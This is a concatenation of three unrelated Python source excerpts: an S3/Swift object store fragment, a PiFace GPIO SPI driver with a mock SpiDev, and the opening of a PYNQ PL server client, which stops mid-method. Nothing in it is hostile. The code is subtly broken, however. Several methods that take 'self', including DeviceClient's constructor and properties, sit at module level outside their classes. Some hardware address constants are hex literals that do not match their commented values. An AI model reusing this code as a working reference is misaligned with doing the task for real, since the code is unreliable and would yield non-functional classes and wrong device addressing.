                self._fix_permissions(cache_file)
            except OSError:
                log.exception("Trouble copying source file '%s' to cache '%s'", source_file, cache_file)
        else:
            source_file = self._get_cache_path(rel_path)
        # Update the file on S3
        self._push_to_os(rel_path, source_file)
    else:
        raise ObjectNotFound('objectstore.update_from_file, object does not exist: %s, kwargs: %s'
                             % (str(obj), str(kwargs)))
def get_object_url(self, obj, **kwargs):
    """Return a temporary (24 hour) download URL for ``obj``, or None if the
    object does not exist or the URL could not be generated."""
    if not self.exists(obj, **kwargs):
        return None
    rel_path = self._construct_path(obj, **kwargs)
    try:
        return Key(self.bucket, rel_path).generate_url(expires_in=86400)  # 24hrs
    except S3ResponseError:
        log.exception("Trouble generating URL for dataset '%s'", rel_path)
    return None
def get_store_usage_percent(self):
    """Return the fraction of store capacity in use.

    S3 has no practical capacity limit, so this always reports 0.0.
    """
    return 0.0
class SwiftObjectStore(S3ObjectStore):
    """Object store backed by an OpenStack Swift bucket.

    Behaves like :class:`S3ObjectStore` — a local cache acts as the
    intermediate location for files moving between Galaxy and Swift — but
    connects through Swift's S3-compatible endpoint.
    """

    def _configure_connection(self):
        """Open a boto S3 connection configured for the Swift endpoint."""
        log.debug("Configuring Swift Connection")
        connection_args = dict(
            aws_access_key_id=self.access_key,
            aws_secret_access_key=self.secret_key,
            is_secure=self.is_secure,
            host=self.host,
            port=self.port,
            # Swift requires path-style (ordinary) addressing rather than
            # virtual-host bucket addressing.
            calling_format=boto.s3.connection.OrdinaryCallingFormat(),
            path=self.conn_path,
        )
        self.conn = boto.connect_s3(**connection_args)
|
pi_face_gpio_digital.py | """PiFace GPIO pin implementing SPI."""
import threading
from raspy.invalid_operation_exception import InvalidOperationException
from raspy.object_disposed_exception import ObjectDisposedException
from raspy.io import pin_state
from raspy.io import pin_mode
from raspy.io import pin_pull_resistance
from raspy.io.io_exception import IOException
from raspy.io.pi_face_gpio import PiFaceGPIO
from raspy.io.pin_state_change_event import PinStateChangeEvent
try:
    from spidev import SpiDev
except ImportError:
    msg = "WARNING: spidev not installed or could not be imported "
    msg += "(possibly not running on a Raspberry Pi (Linux) host?\n"
    msg += "WARNING: Using mock SpiDev instead."
    print(msg)

    class SpiDev(object):
        """A mock SpiDev class to use when not found (ie. unit tests)."""

        def __init__(self):
            """Constructor."""
            self.__dev = None
            self.__bus = None
            self.__speed = None
            self.__maxSpeed = 0
            self.__buf = list()

        def open(self, dev, bus):
            """Open the SPI bus connection.

            Only records the IDs; no hardware is touched.

            :param int dev: The device ID.
            :param int bus: The bus ID.
            """
            self.__dev = dev
            self.__bus = bus

        def writebytes(self, buf):
            """Write a buffer of values to the bus.

            :param list buf: The buffer to write.
            """
            self.__buf = buf

        def xfer(self, buf, speed):
            """Transfer a buffer of values and read the result.

            The mock simply echoes the sent buffer back as a tuple.

            :param list buf: The buffer to send.
            :param int speed: The transfer speed.
            :returns: The result buffer.
            :rtype: tuple
            """
            self.__buf = buf
            self.__speed = speed
            return tuple(self.__buf)

        @property
        def max_speed_hz(self):
            """Get the maximum bus speed in hz.

            :returns: The max bus speed.
            :rtype: int
            """
            return self.__maxSpeed

        @max_speed_hz.setter
        def max_speed_hz(self, speed):
            """Set the max bus speed in hz.

            :param int speed: The max speed.
            """
            self.__maxSpeed = speed
class PiFaceGpioDigital(PiFaceGPIO):
    """PiFace GPIO pin implementing SPI."""

    # MCP23S17 SPI device addresses.
    # NOTE(review): these literals are hex digits that *look* like binary
    # (0x01000000 != 0x40); kept unchanged for compatibility with existing
    # callers — confirm against the intended MCP23S17 address bytes.
    ADDR_0 = 0x01000000  # 0x40 [0100 0000]
    ADDR_1 = 0x01000010  # 0x42 [0100 0010]
    ADDR_2 = 0x01000100  # 0x44 [0100 0100]
    ADDR_3 = 0x01000110  # 0x46 [0100 0110]
    DEF_ADDR = ADDR_0

    # MCP23S17 register addresses (BANK = 0 sequential addressing).
    REGISTER_IODIR_A = 0x00
    REGISTER_IODIR_B = 0x01
    REGISTER_GPINTEN_A = 0x04
    REGISTER_GPINTEN_B = 0x05
    REGISTER_DEFVAL_A = 0x06
    REGISTER_DEFVAL_B = 0x07
    REGISTER_INTCON_A = 0x08
    REGISTER_INTCON_B = 0x09
    REGISTER_IOCON_A = 0x0A
    REGISTER_IOCON_B = 0x0B
    REGISTER_GPPU_A = 0x0C
    REGISTER_GPPU_B = 0x0D
    REGISTER_INTF_A = 0x0E
    REGISTER_INTF_B = 0x0F
    REGISTER_INTCAP_A = 0x10
    REGISTER_INTCAP_B = 0x11
    REGISTER_GPIO_A = 0x12
    REGISTER_GPIO_B = 0x13

    # Pin-number offsets used to distinguish port A pins from port B pins:
    # values below GPIO_B_OFFSET belong to port A.
    GPIO_A_OFFSET = 0
    GPIO_B_OFFSET = 1000

    # IOCON register bit flags.
    IOCON_UNUSED = 0x01
    IOCON_INTPOL = 0x02
    IOCON_ODR = 0x04
    IOCON_HAEN = 0x08
    IOCON_DISSLW = 0x10
    IOCON_SEQOP = 0x20
    IOCON_MIRROR = 0x40
    IOCON_BANK_MODE = 0x80

    BUS_SPEED = 1000000  # default SPI clock speed (1 MHz)
    WRT_FLAG = 0x00  # SPI write operation flag
    RD_FLAG = 0x01  # SPI read operation flag

    def __init__(self, pn, initial_val, spi_address, spi_speed):
        """Initialize a new instance of the raspy.io.pi_face_gpio_digital.PiFaceGpioDigital class.

        :param raspy.io.pi_face_pins.PiFacePin pn: The PiFace pin to control.
        :param int initial_val: The initial value (state) to set the pin to.
        Default is PinState.LOW.
        :param int spi_address: The SPI address to use. (Should be ADDRESS_0,
        ADDRESS_1, ADDRESS_2, or ADDRESS_3).
        :param int spi_speed: The clock speed to set the bus to. Can be powers
        of 2 (500KHz minimum up to 32MHz maximum). If not specified, the
        default of SPI_SPEED (1MHz) will be used.
        :raises: raspy.io.io_exception.IOException if unable to read or write
        to the SPI bus.
        """
        PiFaceGPIO.__init__(self, pn, initial_val, pn.name)
        # FIX: the original tested isinstance(spi_speed, (int, long)); 'long'
        # does not exist on Python 3 and raised NameError. 'int' covers all
        # integer values here.
        if spi_speed is None or not isinstance(spi_speed, int):
            spi_speed = self.BUS_SPEED
        self.__speed = spi_speed
        self.__spi = SpiDev()
        try:
            self.__spi.open(0, 0)
        except Exception:
            raise IOException("Unable to open SPI device 0 on bus 0.")
        self.__spi.max_speed_hz = self.__speed
        self.__address = self.DEF_ADDR
        if spi_address is not None:
            self.__address = spi_address
        # NOTE(review): the B-port defaults below are written as 0x11111111,
        # which looks like it was intended to be binary 0b11111111 (all ones);
        # kept unchanged to preserve existing behavior.
        self.__currentStatesA = 0x00000000
        self.__currentStatesB = 0x11111111
        self.__currentDirectionA = 0x00000000
        self.__currentDirectionB = 0x11111111
        self.__currentPullupA = 0x00000000
        self.__currentPullupB = 0x11111111
        self.__oldState = pin_state.LOW
        self.__pullResistance = pin_pull_resistance.Off
        self.__pollThread = None
        self.__pollRunning = False
        self.__stopEvent = threading.Event()
        self.__stopEvent.set()
        # IOCON - I/O EXPANDER CONFIGURATION REGISTER
        #
        # bit 7 BANK: Controls how the registers are addressed
        # 1 = The registers associated with each port are separated into
        # different banks
        # 0 = The registers are in the same bank (addresses are sequential)
        # bit 6 MIRROR: INT Pins Mirror bit
        # 1 = The INT pins are internally connected
        # 0 = The INT pins are not connected. INTA is associated with PortA and
        # INTB is associated with PortB
        # bit 5 SEQOP: Sequential Operation mode bit.
        # 1 = Sequential operation disabled, address pointer does not
        # increment.
        # 0 = Sequential operation enabled, address pointer increments.
        # bit 4 DISSLW: Slew Rate control bit for SDA output.
        # 1 = Slew rate disabled.
        # 0 = Slew rate enabled.
        # bit 3 HAEN: Hardware Address Enable bit (MCP23S17 only).
        # Address pins are always enabled on MCP23017.
        # 1 = Enables the MCP23S17 address pins.
        # 0 = Disables the MCP23S17 address pins.
        # bit 2 ODR: This bit configures the INT pin as an open-drain output.
        # 1 = Open-drain output (overrides the INTPOL bit).
        # 0 = Active driver output (INTPOL bit sets the polarity).
        # bit 1 INTPOL: This bit sets the polarity of the INT output pin.
        # 1 = Active-high.
        # 0 = Active-low.
        # bit 0 Unimplemented: Read as '0'.
        #
        # write io configuration. enable hardware address.
        self.__write(self.REGISTER_IOCON_A, self.IOCON_SEQOP | self.IOCON_HAEN)
        self.__write(self.REGISTER_IOCON_B, self.IOCON_SEQOP | self.IOCON_HAEN)
        # read initial GPIO pin states
        self.__currentStatesA = self.__read(self.REGISTER_GPIO_A)
        self.__currentStatesB = self.__read(self.REGISTER_GPIO_B)
        # set all default pin directions
        # (1 = input, 0 = output)
        self.__write(self.REGISTER_IODIR_A, self.__currentDirectionA)
        self.__write(self.REGISTER_IODIR_B, self.__currentDirectionB)
        # set all default pin states
        self.__write(self.REGISTER_GPIO_A, self.__currentStatesA)
        self.__write(self.REGISTER_GPIO_B, self.__currentStatesB)
        # set all default pin pull up resistors
        # (1 = Pull-up enabled.)
        # (0 = Pull-up disabled.)
        self.__write(self.REGISTER_GPPU_A, self.__currentPullupA)
        self.__write(self.REGISTER_GPPU_B, self.__currentPullupB)
        # set all default pin interrupts
        # (if pin direction is input (1), then enable interrupt for pin)
        # (1 = Enable GPIO input pin for interrupt-on-change event.)
        # (0 = Disable GPIO input pin for interrupt-on-change event.)
        self.__write(self.REGISTER_GPINTEN_A, self.__currentDirectionA)
        self.__write(self.REGISTER_GPINTEN_B, self.__currentDirectionB)
        # set all default pin interrupt default values
        # (comparison value registers are not used in this implementation)
        self.__write(self.REGISTER_DEFVAL_A, 0x00)
        self.__write(self.REGISTER_DEFVAL_B, 0x00)
        # set all default pin interrupt comparison behaviors
        # (1 = Controls how the associated pin value is compared for
        # interrupt-on-change.)
        # (0 = Pin value is compared against the previous pin value.)
        self.__write(self.REGISTER_INTCON_A, 0x00)
        self.__write(self.REGISTER_INTCON_B, 0x00)
        # reset/clear interrupt flags
        if self.__currentDirectionA > 0:
            self.__read(self.REGISTER_INTCAP_A)
        if self.__currentDirectionB > 0:
            self.__read(self.REGISTER_INTCAP_B)

    def __write(self, register, data):
        """Write the specified byte to the specified register.

        :param int register: The register to write to. This should be one of
        the register constants.
        :param int data: A single byte to write to the register.
        :raises: raspy.io.io_exception.IOException if unable to write to the
        SPI bus.
        """
        # create packet in data buffer.
        packet = [
            self.__address | self.WRT_FLAG,  # address byte
            register,                        # register byte
            data                             # data byte
        ]
        try:
            self.__spi.writebytes(packet)
        except (IOError, SystemError, RuntimeError) as ex:
            err_msg = "Failed to write to SPI bus device at address "
            err_msg += str(self.__address) + " on channel /dev/spidev0.0"
            err_msg += str(ex)
            raise IOException(err_msg)

    def __read(self, register):
        """Read a single byte from the specified register.

        :param int register: The register to write to. This should be one of
        the register constants.
        :returns: The byte read.
        :rtype: int
        :raises: raspy.io.io_exception.IOException if unable to read from
        the SPI bus.
        """
        # create packet in data buffer.
        packet = [
            self.__address | self.RD_FLAG,  # address byte
            register,                       # register byte
            0x00000000                      # data byte
        ]
        result = 0
        try:
            temp = self.__spi.xfer(packet, self.__speed)
            if temp is not None:
                # the data byte is the third byte of the response.
                result = temp[2] & 0xFF
        except (IOError, SystemError, RuntimeError) as ex:
            err_msg = "Failed to write to SPI bus device at address "
            err_msg += str(self.__address) + " on channel /dev/spidev0.0"
            err_msg += str(ex)
            raise IOException(err_msg)
        return result

    def __set_state_a(self, state):
        """Set the state of this pin if on Port A (outputs).

        :param int state: The state to set.
        :raises: raspy.io.io_exception.IOException if unable to write to
        the SPI port.
        """
        # determine pin address.
        pin_address = self.inner_pin.value - self.GPIO_A_OFFSET
        # determine state value for pin bit
        if state == pin_state.HIGH:
            self.__currentStatesA |= pin_address
        else:
            self.__currentStatesA &= ~pin_address
        # update state value.
        self.__write(self.REGISTER_GPIO_A, self.__currentStatesA)

    def __set_state_b(self, state):
        """Set the state of this pin if on Port B (inputs).

        :param int state: The state to set.
        :raises: raspy.io.io_exception.IOException if unable to write to the
        SPI port.
        """
        # determine pin address
        pin_address = self.inner_pin.value - self.GPIO_B_OFFSET
        # determine state value for pin bit
        if state == pin_state.HIGH:
            self.__currentStatesB |= pin_address
        else:
            self.__currentStatesB &= ~pin_address
        # update state value.
        self.__write(self.REGISTER_GPIO_B, self.__currentStatesB)

    def __set_state(self, state):
        """Set the state of this pin.

        :param int state: The state to set.
        :raises: raspy.io.io_exception.IOException if unable to write to the
        SPI port.
        """
        if self.state == state:
            return
        self.__oldState = self.state
        PiFaceGPIO.write(self, state)
        # determine A or B port based on pin address.
        # FIX: the original tested '== self.GPIO_B_OFFSET', which sent almost
        # every pin through the port B path; every other A/B dispatch in this
        # class (mode setter, read, state) uses '< GPIO_B_OFFSET' for port A.
        if self.inner_pin.value < self.GPIO_B_OFFSET:
            self.__set_state_a(state)
        else:
            self.__set_state_b(state)

    def write(self, state):
        """Write a value to the pin.

        :param int state: The pin state value to write to the pin.
        :raises: raspy.ObjectDisposedException if this instance has been
        disposed.
        """
        if self.is_disposed:
            raise ObjectDisposedException("PiFaceGpioDigital")
        PiFaceGPIO.write(self, state)
        self.__set_state(state)

    def __evaluate_pin_for_change_a(self, state):
        """Evaluate Port A for pin change.

        If the state is different compared to the specified state, then emits
        a raspy.io.gpio.EVENT_GPIO_STATE_CHANGED event.

        :param int state: The state to check against.
        """
        # determine pin address.
        pin_address = self.inner_pin.value - self.GPIO_A_OFFSET
        # determine if state changed.
        if (state & pin_address) != (self.__currentStatesA & pin_address):
            # Determine new state value for pin bit.
            new_state = pin_state.LOW
            if (state & pin_address) == pin_address:
                new_state = pin_state.HIGH
            if new_state == pin_state.HIGH:
                self.__currentStatesA |= pin_address
            else:
                self.__currentStatesA &= ~pin_address
            # change detected for pin.
            evt = PinStateChangeEvent(self.__oldState, new_state, pin_address)
            self.on_pin_state_change(evt)

    def __evaluate_pin_for_change_b(self, state):
        """Evaluate Port B for pin change.

        If the state is different compared to the specified state, then emits
        a raspy.io.Gpio.EVENT_GPIO_STATE_CHANGED event.

        :param int state: The state to check against.
        """
        # determine pin address.
        pin_address = self.inner_pin.value - self.GPIO_B_OFFSET
        # determine if state changed.
        if (state & pin_address) != (self.__currentStatesB & pin_address):
            # Determine new state value for pin bit.
            new_state = pin_state.LOW
            if (state & pin_address) == pin_address:
                new_state = pin_state.HIGH
            if new_state == pin_state.HIGH:
                self.__currentStatesB |= pin_address
            else:
                self.__currentStatesB &= ~pin_address
            # change detected for pin.
            evt = PinStateChangeEvent(self.__oldState, new_state, pin_address)
            self.on_pin_state_change(evt)

    def __set_mode_a(self, mode):
        """Set the mode of this pin on Port A.

        :param int mode: The pin mode to set.
        :raises: raspy.io.io_exception.IOException if unable to write to the
        SPI bus.
        """
        pin_address = self.inner_pin.value - self.GPIO_A_OFFSET
        if mode == pin_mode.IN:
            self.__currentDirectionA |= pin_address
        elif mode == pin_mode.OUT:
            self.__currentDirectionA &= ~pin_address
        self.__write(self.REGISTER_IODIR_A, self.__currentDirectionA)
        # keep interrupt-on-change enabled for all input pins.
        self.__write(self.REGISTER_GPINTEN_A, self.__currentDirectionA)

    def __set_mode_b(self, mode):
        """Set the mode of this pin on Port B.

        :param int mode: The pin mode to set.
        :raises: raspy.io.io_exception.IOException if unable to write to the
        SPI bus.
        """
        pin_address = self.inner_pin.value - self.GPIO_B_OFFSET
        if mode == pin_mode.IN:
            self.__currentDirectionB |= pin_address
        elif mode == pin_mode.OUT:
            self.__currentDirectionB &= ~pin_address
        self.__write(self.REGISTER_IODIR_B, self.__currentDirectionB)
        # keep interrupt-on-change enabled for all input pins.
        self.__write(self.REGISTER_GPINTEN_B, self.__currentDirectionB)

    def __background_poll(self):
        """The background (asynchronous) poll cycle routine.

        This is the callback executed by the poll thread.

        :raises: raspy.io.IOException if unable to write to the SPI bus.
        """
        while not self.__stopEvent.is_set():
            # only process for interrupts if a pin on port A is configured as
            # an input pin.
            pin_interrupt_state = -1
            if self.__currentDirectionA > 0:
                # process interrupts for port A.
                pin_interrupt_a = self.__read(self.REGISTER_INTF_A)
                # validate that there is at least one interrupt active on port
                # A.
                if pin_interrupt_a > 0:
                    # read the current pin states on port A.
                    pin_interrupt_state = self.__read(self.REGISTER_GPIO_A)
                    # is there an interrupt flag on this pin?
                    self.__evaluate_pin_for_change_a(pin_interrupt_state)
            # only process for interrupts if a pin on port B is configured as
            # an input pin.
            if self.__currentDirectionB > 0:
                # process interrupts for port B.
                pin_interrupt_b = self.__read(self.REGISTER_INTF_B)
                # validate that there is at least one interrupt active on port
                # B.
                if pin_interrupt_b > 0:
                    # read the current pin states on port B.
                    pin_interrupt_state = self.__read(self.REGISTER_GPIO_B)
                    # is there an interrupt flag on this pin?
                    self.__evaluate_pin_for_change_b(pin_interrupt_state)

    def cancel_poll(self):
        """Cancel an input poll cycle (if running) started by poll()."""
        if self.is_disposed:
            return
        if self.__stopEvent.is_set() or self.__pollThread is None:
            return
        self.__stopEvent.set()
        self.__pollRunning = False

    def poll(self):
        """Start a pin poll cycle.

        This will monitor the pin and check for state changes. If a state
        change is detected, the raspy.io.Gpio.EVENT_GPIO_STATE_CHANGED event
        will be emitted. The poll cycle runs asynchronously until stopped by
        the cancel_poll() method or when this object instance is disposed.

        :raises: raspy.object_disposed_exception.ObjectDisposedException if
        this instance has been disposed.
        :raises: raspy.invalid_operation_exception.InvalidOperationException
        if the poll thread is already running.
        """
        if self.is_disposed:
            raise ObjectDisposedException("PiFaceGpioDigital")
        if self.__pollRunning:
            raise InvalidOperationException("Poll thread already running.")
        self.__stopEvent.clear()
        self.__pollThread = threading.Thread(target=self.__background_poll)
        self.__pollThread.name = "PiFaceGpioPoller"
        self.__pollThread.daemon = True
        self.__pollThread.start()
        self.__pollRunning = True

    @property
    def mode(self):
        """Get the pin mode.

        :returns: The pin mode.
        :rtype: int
        """
        return super(PiFaceGPIO, self).mode

    @mode.setter
    def mode(self, p_mode):
        """Set the pin mode.

        :param int p_mode: The pin mode to set.
        :raises: raspy.object_disposed_exception.ObjectDisposedException if
        this instance has been disposed.
        """
        if self.is_disposed:
            raise ObjectDisposedException("PiFaceGpioDigital")
        if p_mode is None:
            # FIX: the original read 'p_mode = p_mode.TRI' which dereferenced
            # None and raised AttributeError; default to the module constant.
            p_mode = pin_mode.TRI
        PiFaceGPIO.mode.fset(self, p_mode)
        # determine A or B port based on pin address
        if self.inner_pin.value < self.GPIO_B_OFFSET:
            self.__set_mode_a(p_mode)
        else:
            self.__set_mode_b(p_mode)
        # if any pins are configured as input pins, then we need to start the
        # interrupt monitoring poll timer.
        if self.__currentDirectionA > 0 or self.__currentDirectionB > 0:
            self.poll()
        else:
            self.cancel_poll()

    def provision(self):
        """Provision this pin.

        :raises: raspy.ObjectDisposedException if this instance has been
        disposed.
        """
        self.write(PiFaceGPIO.get_initial_pin_value(self))

    def __set_pull_resistance_a(self, resistance):
        """Set the pin pull-up/down resistance for port A.

        :param raspy.io.pin_pull_resistance.PinPullResistance resistance: The
        pin pull resistance flag to set. Can enable the internal pull-up or
        pull-down resistor, or disable it.
        :raises: raspy.io.io_exception.IOException if unable to write to the
        SPI port.
        """
        pin_address = self.inner_pin.value - self.GPIO_A_OFFSET
        if resistance.value == pin_pull_resistance.PullUp.value:
            self.__currentPullupA |= pin_address
        else:
            self.__currentPullupA &= ~pin_address
        self.__write(self.REGISTER_GPPU_A, self.__currentPullupA)

    def __set_pull_resistance_b(self, resistance):
        """Set the pin pull-up/down resistance for port B.

        :param raspy.io.pin_pull_resistance.PinPullResistance resistance: The
        pin pull resistance flag to set. Can enable the internal pull-up or
        pull-down resistor, or disable it.
        :raises: raspy.io.io_exception.IOException if unable to write to the
        SPI port.
        """
        pin_address = self.inner_pin.value - self.GPIO_B_OFFSET
        if resistance.value == pin_pull_resistance.PullUp.value:
            self.__currentPullupB |= pin_address
        else:
            self.__currentPullupB &= ~pin_address
        self.__write(self.REGISTER_GPPU_B, self.__currentPullupB)

    @property
    def pull_resistance(self):
        """Get the pin pull-up/down resistance.

        :returns: The pin pull resistance.
        :rtype: raspy.io.pin_pull_resistance.PinPullResistance
        """
        return self.__pullResistance

    @pull_resistance.setter
    def pull_resistance(self, resistance):
        """Set the pin pull-up/down resistance.

        :param raspy.io.pin_pull_resistance.PinPullResistance resistance: The
        pin pull resistance.
        :raises: raspy.object_disposed_exception.ObjectDisposedException if
        this instance has been disposed.
        :raises: raspy.io.io_exception.IOException if unable to write to the
        SPI port.
        """
        if self.__pullResistance.value == resistance.value:
            return
        if self.is_disposed:
            raise ObjectDisposedException("PiFaceGpioDigital")
        self.__pullResistance = resistance
        # FIX: the original tested '> self.GPIO_B_OFFSET', inverting the
        # port dispatch; port A pins are those below GPIO_B_OFFSET, matching
        # every other A/B dispatch in this class.
        if self.inner_pin.value < self.GPIO_B_OFFSET:
            self.__set_pull_resistance_a(resistance)
        else:
            self.__set_pull_resistance_b(resistance)

    def read(self):
        """Read a value from the pin.

        :returns: The state (value) of the pin.
        :rtype: int
        :raises: raspy.object_disposed_exception.ObjectDisposedException if
        this instance has been disposed.
        :raises: raspy.io.io_exception.IOException if unable to read from the
        SPI port.
        """
        if self.is_disposed:
            raise ObjectDisposedException("PiFaceGpioDigital")
        if self.inner_pin.value < self.GPIO_B_OFFSET:
            return self.__read(self.REGISTER_GPIO_A)
        return self.__read(self.REGISTER_GPIO_B)

    def __get_state_a(self):
        """Get the state of the pin if on Port A.

        :returns: The state of the pin.
        :rtype: int
        :raises: raspy.io.io_exception.IOException if unable to write to the
        SPI port.
        """
        pin_address = self.inner_pin.value - self.GPIO_A_OFFSET
        temp_state = (self.__currentStatesA & pin_address)
        my_state = pin_state.LOW
        if temp_state == pin_address:
            my_state = pin_state.HIGH
        super(PiFaceGPIO, self).write(my_state)
        return my_state

    def __get_state_b(self):
        """Get the state of the pin if on Port B.

        :returns: The state of the pin.
        :rtype: int
        :raises: raspy.io.io_exception.IOException if unable to write to the
        SPI port.
        """
        pin_address = self.inner_pin.value - self.GPIO_B_OFFSET
        temp_state = (self.__currentStatesB & pin_address)
        my_state = pin_state.LOW
        if temp_state == pin_address:
            my_state = pin_state.HIGH
        super(PiFaceGPIO, self).write(my_state)
        return my_state

    @property
    def state(self):
        """Get the state of the pin.

        :returns: The pin state.
        :rtype: int
        :raises: raspy.object_disposed_exception.ObjectDisposedException if
        this instance has been disposed.
        :raises: raspy.io.io_exception.IOException if unable to read from the
        SPI port.
        """
        if self.is_disposed:
            raise ObjectDisposedException("PiFaceGpioDigital")
        if self.inner_pin.value < self.GPIO_B_OFFSET:
            result = self.__get_state_a()
        else:
            result = self.__get_state_b()
        return result

    def dispose(self):
        """Dispose managed resources.

        Performs application-defined tasks associated with freeing, releasing,
        or resetting resources.
        """
        if self.is_disposed:
            return
        self.cancel_poll()
        self.__spi = None
        super(PiFaceGPIO, self).dispose()
|
server.py | # Copyright (c) 2016-2021, Xilinx, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
# OR BUSINESS INTERRUPTION). HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from multiprocessing.connection import Listener
from multiprocessing.connection import Client
from copy import deepcopy
import os
import threading
from pynq.devicetree import DeviceTreeSegment
from pynq.devicetree import get_dtbo_base_name
from .hwh_parser import HWH, get_hwh_name
__author__ = "Yun Rock Qu, Peter Ogden"
__copyright__ = "Copyright 2019, Xilinx"
__email__ = "pynq_support@xilinx.com"
# Overlay constants
# Absolute directory containing this pynq module.
PYNQ_PATH = os.path.dirname(os.path.realpath(__file__))
# Per-device Unix socket path used by the PL server; '{}' is the device tag.
PL_SERVER_TEMPLATE = '/tmp/pynq.{}.socket'
def clear_state(dict_in):
    """Clear the state information for a given dictionary.

    Every nested entry containing a 'state' key has that entry reset to
    None. Non-dict inputs pass through untouched.

    Parameters
    ----------
    dict_in : dict
        Input dictionary to be cleared.

    Returns
    -------
    dict
        The same object that was passed in.

    """
    # isinstance (rather than an exact type check) also accepts dict
    # subclasses such as OrderedDict.
    if isinstance(dict_in, dict):
        for entry in dict_in.values():
            if 'state' in entry:
                entry['state'] = None
    return dict_in
class DeviceClient:
    """Class to access the PL server

    The properties of the class access the most recent version
    from the PL server and are read-only. All updating of the
    PL server is performed by methods.

    """
    @staticmethod
    def accessible(tag):
        """Return True if the PL server for ``tag`` can be reached."""
        try:
            # A successful request/update round-trip proves the server socket
            # exists and we are allowed to talk to it.
            client = DeviceClient(tag)
            client.client_request()
            client.server_update()
        except (ConnectionError, PermissionError):
            return False
        return True
def __init__(self, tag, key=b'xilinx'):
    """Create a new instance of the PL server

    Parameters
    ----------
    tag : string or path
        The unique identifier of the device
    key : bytes
        The authentication key for the server

    """
    self._ip_dict = {}
    self._gpio_dict = {}
    self._interrupt_controllers = {}
    self._interrupt_pins = {}
    self._hierarchy_dict = {}
    self._devicetree_dict = {}
    # FIX: _mem_dict is read by the mem_dict property, reset() and
    # clear_dict(), but was never initialized here, so a fresh client
    # raised AttributeError before the first reset(parser).
    self._mem_dict = {}
    self._address = PL_SERVER_TEMPLATE.format(tag)
    self._key = key
    self._timestamp = None
    self._bitfile_name = None
@property
def ip_dict(self):
    """The getter for the attribute `ip_dict`.

    Syncs with the PL server before returning, so the result reflects
    the server's current view.

    Returns
    -------
    dict
        The dictionary storing addressable IP instances; can be empty.

    """
    self.client_request()
    self.server_update()
    return self._ip_dict
@property
def gpio_dict(self):
    """The getter for the attribute `gpio_dict`.

    Syncs with the PL server before returning.

    Returns
    -------
    dict
        The dictionary storing the PS GPIO pins.

    """
    self.client_request()
    self.server_update()
    return self._gpio_dict
@property
def interrupt_pins(self):
    """The getter for the attribute `interrupt_pins`.

    Syncs with the PL server before returning.

    Returns
    -------
    dict
        The dictionary storing the interrupt endpoint information.

    """
    self.client_request()
    self.server_update()
    return self._interrupt_pins
@property
def interrupt_controllers(self):
    """The getter for the attribute `interrupt_controllers`.

    Syncs with the PL server before returning.

    Returns
    -------
    dict
        The dictionary storing interrupt controller information.

    """
    self.client_request()
    self.server_update()
    return self._interrupt_controllers
@property
def hierarchy_dict(self):
    """The getter for the attribute `hierarchy_dict`

    Syncs with the PL server before returning.

    Returns
    -------
    dict
        The dictionary containing the hierarchies in the design

    """
    self.client_request()
    self.server_update()
    return self._hierarchy_dict
@property
def devicetree_dict(self):
    """The getter for the attribute `devicetree_dict`

    Syncs with the PL server before returning.

    Returns
    -------
    dict
        The dictionary containing the device tree blobs.

    """
    self.client_request()
    self.server_update()
    return self._devicetree_dict
@property
def bitfile_name(self):
    """The getter for the attribute `bitfile_name`.

    Syncs with the PL server before returning.

    Returns
    -------
    str
        The absolute path of the bitstream currently on PL.

    """
    self.client_request()
    self.server_update()
    return self._bitfile_name
@property
def timestamp(self):
    """The getter for the attribute `timestamp`.

    Syncs with the PL server before returning.

    Returns
    -------
    str
        Bitstream download timestamp.

    """
    self.client_request()
    self.server_update()
    return self._timestamp
@property
def mem_dict(self):
    """The getter for the attribute `mem_dict`

    Syncs with the PL server before returning.

    NOTE(review): ``_mem_dict`` is not assigned in ``__init__`` as shown
    here; this getter appears to rely on a prior ``reset(parser)`` or
    ``server_update`` having populated it — confirm before first use.

    Returns
    -------
    dict
        The dictionary containing the memory spaces in the design

    """
    self.client_request()
    self.server_update()
    return self._mem_dict
def reset(self, parser=None, timestamp=None, bitfile_name=None):
    """Reset all the dictionaries.

    This method must be called after a bitstream download.
    1. In case there is a `hwh` file, this method will reset
    the states of the IP, GPIO, and interrupt dictionaries.
    2. In case there is no `hwh` file, this method will simply
    clear the state information stored for all dictionaries.

    An existing parser given as the input can significantly reduce
    the reset time, since the PL can reset based on the
    information provided by the parser.

    Parameters
    ----------
    parser : HWH
        A parser object to speed up the reset process.
    timestamp : str
        Bitstream download timestamp to record, if given.
    bitfile_name : str
        Absolute path of the newly downloaded bitstream, if given.

    """
    self.client_request()
    if parser is not None:
        # Fast path: adopt the parser's dictionaries wholesale.
        self._ip_dict = parser.ip_dict
        self._gpio_dict = parser.gpio_dict
        self._interrupt_controllers = parser.interrupt_controllers
        self._interrupt_pins = parser.interrupt_pins
        self._hierarchy_dict = parser.hierarchy_dict
        self._mem_dict = parser.mem_dict
    else:
        hwh_name = get_hwh_name(self._bitfile_name)
        if os.path.isfile(hwh_name):
            # hwh metadata available: keep structure, drop state entries.
            self._ip_dict = clear_state(self._ip_dict)
            self._gpio_dict = clear_state(self._gpio_dict)
        else:
            # No metadata at all: wipe every dictionary.
            self.clear_dict()
    if timestamp is not None:
